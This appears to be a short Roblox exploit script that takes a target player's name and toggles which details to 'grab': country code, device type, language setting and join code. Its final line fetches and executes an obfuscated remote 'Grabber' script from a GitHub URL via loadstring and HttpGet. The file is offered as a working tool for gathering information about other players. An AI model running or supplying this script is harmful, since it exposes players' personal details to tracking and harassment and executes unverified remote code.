1. Target = "NameHere" -- Your Target's name (auto completes)
  2. settings = {
  3. --[[
  4. true = Yes
  5. false = No
  6. ]]
  7. CountryCode = true, -- If you want it to print their their country code (for example: USA = United States of America)
  8. DeviceType = true, -- If you want it to print their device type (aka PC, Mobile, Console, Tablet, etc)
  9. RobloxLanguage = true, -- If you want it to print the language their roblox is set to
  10. JoinCode = true, -- If you want it to print their Join code (used to join people in that shit game)
  11. }
  12. loadstring(game:HttpGet("https://raw.githubusercontent.com/Bukito20/Public-scripts/main/Grabber%20obfu%20islands.lua"))()